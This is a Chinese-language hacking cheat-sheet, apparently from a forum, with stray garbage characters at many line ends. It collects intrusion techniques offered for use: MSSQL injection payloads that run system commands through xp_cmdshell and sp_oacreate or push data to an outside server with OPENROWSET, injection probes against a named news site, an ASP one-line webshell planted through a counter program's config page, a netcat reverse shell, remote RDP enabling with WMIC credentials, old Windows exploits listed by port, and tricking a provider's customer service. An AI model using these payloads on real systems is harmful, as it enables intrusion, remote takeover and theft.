SA点数据库分离技术相关
6 k2 b) |0 j5 H6 q9 a1 w: D2 q% v( V) ]. t; F, g; q+ l
4 p" N5 m7 O& b; O. lSA点数据库分离搞法+语句:7 h8 J* ]+ D% Y
3 ]+ f6 `+ L" H& N6 F0 t7 b
注射点不显错,执行下面三条语句页面都返回正常。* T( Y, I0 N. M$ y/ B3 ]# f. Z
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')3 P7 l" N1 c7 b) w6 `+ A
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
' W; J- S5 F+ Z2 m8 T4 Rand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')4 J1 b0 r( V: }$ F0 E3 W
可以列目录,判断系统为2000,web与数据库分离
1 c/ l4 a- z5 f U遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。0 P6 U5 N6 P, I$ T `8 f
在注射点上执行! m1 C+ l4 x$ [! K+ A: q+ `- W3 U. b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--2 Z8 [* ]3 O6 y: ^7 B7 z
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
\/ w/ @1 @! _" X5 p: Y( C2 M还有我用NC监听得其他端口都没有得到IP。( M9 R0 i2 @! w& r7 k+ V( V
4 @. `' q/ |! f, ~% K; f' B通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。2 m/ Q# H2 S' b8 M7 |) S3 q
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--4 L% b, C; I, z
& l5 h, f) v3 r6 y5 }9 @;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--4 x! E& |% e1 e( c. |2 C+ j+ A
1 x0 d: ]* Z5 C! Q0 }: t现在就猜想是不是数据库是内网而且不能连外网。
: I8 h0 m3 N8 I9 }" x! }; P: \7 w. l9 v
! I( E1 a( ?' Xaccess导出txt文本代码
/ V4 t) F' {3 l, ^, qSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
6 g5 }2 _0 _. L* W2 b3 i: \6 U$ y6 x$ T# X2 u( }' ~2 R
' `6 L0 s: a- ~7 m1 h8 f/ p; O o1 ]% Z1 w
自动跳转到指定网站代码头4 _5 \$ [* B4 \& Z: ?+ j5 y7 v F
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>& G4 i# d; f5 w( V( a6 J
H& |2 J& P! D# E$ e1 l
* C4 ^( U5 Z1 Y. @9 K& x入侵java or jsp站点时默认配置文件路径:
! }! E* x1 z5 A& u. y9 m+ F\web-inf\web.xml2 f- }) n _/ ~. K
tomcat下的配置文件位置:
% c1 o i8 g8 {% p: ~2 R\conf\server.xml (前面加上tomcat路径)
% m4 B% [$ }1 V\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
- m3 V' z& Y" a
1 W/ D+ I5 {1 }
$ n1 `& j0 F- o% E4 X( e' h D1 R, g: g* O# q' m V+ @
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:- Z% m% [8 {- m4 w
-1%232 ]- l3 t0 i7 [( y0 x) r) |; v
> 6 @& s( a( D! A: L. q3 \
<7 i- h I( l6 ?
1'+or+'1'='1
, H7 v$ h# }$ |) o7 pid=8%bf
0 p3 A; s( C5 M1 m3 O, r/ N/ e& x" L. R' h) R/ _ l% R4 @/ G8 P
全新注入点检测试法:
# Y2 s3 p# x1 j在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
; C7 z1 ~2 N: n. |9 [8 y( r2 M0 P) u, Z( Z
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。8 ~% K, U$ V" T: C5 ^
& N" o6 C0 f& J; C+ r+ h/ F搜索型注入判断方法:7 C3 r q; H- K8 V K. G& J5 Z
北京%' and '1'='1' and '%'='
: q+ ^5 `) N# q北京%' and '1'='2' and '%'='5 a) y0 |7 W* S4 e" _0 Y
' z, k6 b6 o6 D0 h0 D
% E; P7 x' t" C2 C8 [, WCOOKIES注入:+ j4 U6 S+ O* ?( `5 C
3 t' A9 [( S* I3 L, f, ljavascript:alert(document.cookie="id="+escape("51 and 1=1"));
8 b+ Q4 t& _) w- v1 ~# {7 a; C9 L
: n4 G2 R1 D3 K" V& o# t7 y2000专业版查看本地登录用户命令:
$ _% D5 U' e9 P0 u; O+ [, d, d% V* enet config workstation# u- ^4 J& c9 z" A8 `0 v) Q6 C
7 |2 Q& B$ Q- r8 K$ _& R- y8 r& A# A3 s7 Q3 f R5 G
2003下查看ipsec配置和默认防火墙配置命令:
( ^4 j- ` B I9 I Anetsh firewall show config
& ]% y' D5 T+ y% K4 m& u! Anetsh ipsec static show all
) o$ C, u' z4 b; U$ b |1 |5 l
( x8 W' @0 I5 w' w, g不指派指定策略命令:. ]% n! o$ Y/ R& ]/ l3 v
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)2 X4 x- e% E8 w. {, w0 [
netsh ipsec static show policy all 显示策略名
, C/ U I" W$ X' A7 z7 a
/ @6 s) X* X% F/ ^4 m* W. o
! t/ e% x! B2 }) f s+ x猜管理员后台小技巧:) [4 a2 d- m& d5 l% `4 e
admin/left.asp
% ~" ?# i' m; @6 qadmin/main.asp
" @- q) l& B+ N0 sadmin/top.asp
" A2 U d2 S y& N% p- ~admin/admin.asp
7 X9 X0 i- |* @9 R( U y. V会现出菜单导航,然后迅雷下载全部链接% }- d# Y# P7 {4 R
3 @, K5 L5 e" s; X/ k% k U4 }' D- \. v9 d2 ?% l
社会工程学:
2 L# C7 Q5 q1 ^( z1 B用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人, A. C( |3 d9 P! [: P) W
然后去骗客服
1 ]. V* a( i: ?8 m' u6 a" M1 r& Z, F: f( X4 M0 p" _5 k
2 y5 [6 H% B- }1 w6 A. P统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
$ Q2 t6 S. U- D- k1 X+ i. t+ W查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
1 L) t6 @6 ^' U: f 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。* P! `) p* _" S. J$ o' ~$ F% m( M! E, l6 S
; e9 d& I' O) G7 V2 V
7 w. R/ N5 n. O) z: _1 r
: U/ A K6 r5 C- I' P9 p( D+ Y6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
- I/ B& @0 j* b) `% i1 V- d3 a' P6 u/ _4 s9 H T" ~0 A
6 J& j" ?' W2 d) z+ h. g1 S. H2 A% L+ Q$ B/ |% t: j1 X
CMD加密注册表位置
2 H* s) p/ h3 C" J2 N1 E: u' r" [(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
; L; v3 K3 b9 P/ _$ S7 |) zAutoRun: N' V+ ]' ]8 `
6 h: ~4 l- {( _6 u; A
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor$ c1 V F) t; E0 V) M
AutoRun5 Q4 p9 ^! h( s1 J( Z! Y1 R
& | g2 E, r, P$ ^* U
) K+ g, l2 C' Q1 p在找注入时搜索Hidden,把他改成test
& {: N" `5 d! l0 \7 V0 @& s1 Q$ y/ r1 V B
+ r( W( ^* k( N
$ t* Y4 J2 \+ k, B
mstsc /v:IP /console 0 W$ Q8 E) u' U6 W" @0 [2 A
- d0 |6 h3 z/ ]! [, X/ n! E( D% v6 L7 V2 E2 f) v7 S9 ^ v2 _
一句话开3389:% A4 ^ o& i2 u7 z
8 F: u" m' z. F- G2 |
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
7 k4 l- z+ V3 {) F% z开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
6 M: Q+ | T/ L
/ S$ R! R+ }1 P8 V4 ~4 t) |! B4 Z6 t( [- C
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:' X( _% [$ R* \& b _: p
Insert into admin(user,pwd) values('test','test')4 W& X* m9 Z. h8 \/ q' ^+ h
# y2 V, A. @) k. d; V4 D6 r
; [) Z# Z. V" L7 M( n! y4 P" x* CNC反弹( D0 o( v& m5 @( L. ~5 B# ]0 ^5 }
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
8 ]' U/ D+ S9 \6 z然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
; `) t3 y8 i, W+ V, s+ U4 s" d3 t1 Q( i: @
* |' }, `( q7 D2 h3 C5 F
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题% y7 S. S% b0 }0 x( l' Z
) |) A$ h1 e' n/ v; S# Z2 f有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录! D7 `- ~* X( u! J' L% Q
例如:- c; T+ m! U( v- P6 X6 l7 p
subst k: d:\www\ 用d盘www目录替代k盘: k3 t. K& r& @4 j3 A) C4 l
subst k: /d 解除K盘代替 |